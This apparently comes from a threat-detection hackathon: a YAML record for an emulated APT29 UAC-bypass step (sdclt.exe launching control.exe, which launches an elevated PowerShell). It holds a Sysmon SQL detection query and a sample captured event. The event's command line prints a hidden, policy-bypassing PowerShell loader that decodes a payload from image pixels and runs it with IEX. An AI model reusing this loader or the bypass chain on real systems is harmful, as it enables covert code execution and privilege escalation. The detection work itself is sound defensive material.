vendor: OTR Community | |
step: 3.B.2 | |
procedure: Executed elevated PowerShell payload | |
criteria: High integrity powershell.exe spawning from control.exe (spawned from sdclt.exe) | |
technique: | |
name: Bypass User Account Control | |
id: T1088 | |
issue: https://github.com/OTRF/detection-hackathon-apt29/issues/6 | |
detections: | |
- main_type: Telemetry | |
modifier_type: | |
description: Telemetry showed sdclt.exe being spawned as a high integrity process and control.exe creating a high integrity powershell.exe. | |
reference: | |
queries: | |
- id: 6C8780E9-E6AF-4210-8EA0-72E9017CEE7D | |
data_sources: | |
- event_provider: Microsoft-Windows-Sysmon/Operational | |
event_logs: | |
- 1 | |
rule_contribution: | |
logic: | | |
-- Sysmon process-creation events (EventID 1) for a High-integrity child whose
-- parent is control.exe and whose parent was itself launched by sdclt.exe,
-- i.e. the sdclt.exe -> control.exe -> elevated child chain of step 3.B.2.
-- NOTE(review): the child Image is not constrained here, so any High-integrity
-- child of that control.exe instance is returned, not only powershell.exe.
WITH control_from_sdclt AS (
    -- control.exe instances that were spawned by sdclt.exe
    SELECT ProcessGuid
    FROM apt29Host
    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
        AND EventID = 1
        AND LOWER(Image) LIKE "%control.exe"
        AND LOWER(ParentImage) LIKE "%sdclt.exe"
)
SELECT child.Message
FROM apt29Host AS child
INNER JOIN control_from_sdclt AS parent
    ON child.ParentProcessGuid = parent.ProcessGuid
WHERE child.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND child.EventID = 1
    AND child.IntegrityLevel = "High"
output: | | |
Process Create: | |
RuleName: - | |
UtcTime: 2020-05-02 02:58:44.325 | |
ProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400} | |
ProcessId: 2976 | |
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | |
FileVersion: 10.0.18362.1 (WinBuild.160101.0800) | |
Description: Windows PowerShell | |
Product: Microsoft® Windows® Operating System | |
Company: Microsoft Corporation | |
OriginalFileName: PowerShell.EXE | |
CommandLine: "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))" | |
CurrentDirectory: C:\windows\system32\ | |
User: DMEVALS\pbeesly | |
LogonGuid: {47ab858c-dabe-5eac-812e-370000000000} | |
LogonId: 0x372E81 | |
TerminalSessionId: 2 | |
IntegrityLevel: High | |
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481 | |
ParentProcessGuid: {47ab858c-e1e3-5eac-b603-000000000400} | |
ParentProcessId: 4892 | |
ParentImage: C:\Windows\System32\control.exe | |
ParentCommandLine: "C:\Windows\System32\control.exe" /name Microsoft.BackupAndRestoreCenter |